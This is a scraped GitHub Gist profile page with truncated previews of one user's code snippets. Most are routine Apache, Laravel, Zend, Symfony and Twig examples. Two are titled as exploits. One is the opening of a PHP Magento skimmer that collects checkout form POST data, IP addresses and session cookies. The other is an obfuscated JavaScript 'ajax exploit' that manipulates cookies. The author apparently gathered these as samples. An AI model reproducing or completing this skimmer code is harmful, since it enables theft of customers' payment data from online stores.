Bobby Kozora bkozora
bkozora
/ Magento Exploit 4.php
Last active
August 16, 2017 18:35
Magento Exploit - Base64 Encode of Form Data into gif File
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if ( isset($_POST) && is_array($_POST) && count($_POST) > 0 ) { | |
| $ARINFO = $_POST; | |
| $ARINFO['date'] = $_SERVER['REQUEST_TIME']; | |
| $ARINFO['ip'] = $_SERVER['REMOTE_ADDR']; | |
| $ARINFO['url'] = $_SERVER['REQUEST_URI']; | |
| if(isset($_COOKIE['frontend'])) $ARINFO['cookie'] = $_COOKIE['frontend']; | |
| if((strpos($_SERVER['REQUEST_URI'], 'checkout/onepage')) or (strpos($_SERVER['REQUEST_URI'], 'firecheckout')) or (strpos($_SERVER['REQUEST_URI'], 'onestepcheckout'))) | |
| { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DocumentRoot "/var/www/vhosts" | |
| <Directory "/var/www/vhosts"> | |
| Options Indexes FollowSymLinks ExecCGI | |
| AllowOverride All | |
| Order allow,deny | |
| Allow from all | |
| #Require all granted | |
| </Directory> |
bkozora
/ slightly-less-clever-js-ajax-exploit.js
Last active
August 29, 2015 14:27
slightly less clever js ajax exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * still rather clever, still not mine | |
| */ | |
| function jj(e) { | |
| var t = "; " + document.cookie, | |
| o = t.split("; " + e + "="); | |
| return 2 == o.length ? o.pop().split(";").shift() : void 0 | |
| } | |
| jj("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime()), jQuery(function(e) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Not mine | |
| */ | |
| var _0x22dd = [ | |
| "\x63\x6F\x6E\x73\x6F\x6C\x65", | |
| "\x6C\x6F\x67", | |
| "\x66\x69\x72\x65\x62\x75\x67", | |
| "\x63\x6C\x65\x61\x72", | |
| "\x73\x65\x72\x69\x61\x6C\x69\x7A\x65", |
bkozora
/ PHP CodeSniffer Example
Created
June 23, 2015 14:24
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Checking a directory with PHP_CodeSniffer | |
| $ phpcs /path/to/code | |
| FILE: /path/to/code/myfile.php | |
| -------------------------------------------------------------------------------- | |
| FOUND 5 ERROR(S) AFFECTING 5 LINE(S) | |
| -------------------------------------------------------------------------------- | |
| 2 | ERROR | Missing file doc comment | |
| 20 | ERROR | PHP keywords must be lowercase; expected "false" but found "FALSE" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class UserController extends BaseController { | |
| /** | |
| * Show the profile for the given user. | |
| */ | |
| public function showProfile($id) | |
| { | |
| $user = User::find($id); | |
| return View::make('user.profile', array('user' => $user)); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| return array( | |
| 'controllers' => array( | |
| 'invokables' => array( | |
| 'Album\Controller\Album' => 'Album\Controller\AlbumController', | |
| ), | |
| ), | |
| // The following section is new and should be added to your file | |
| 'router' => array( | |
| 'routes' => array( |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # app/config/routing.yml | |
| blog_show: | |
| path: /blog/{slug} | |
| defaults: { _controller: AppBundle:Blog:show } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // src/AppBundle/Controller/BlogController.php | |
| namespace AppBundle\Controller; | |
| use Symfony\Bundle\FrameworkBundle\Controller\Controller; | |
| use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route; | |
| class BlogController extends Controller | |
| { | |
| /** |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <title>My Webpage</title> | |
| </head> | |
| <body> | |
| <ul id="navigation"> | |
| {% for item in navigation %} | |
| <li><a href="{{ item.href }}">{{ item.caption }}</a></li> | |
| {% endfor %} |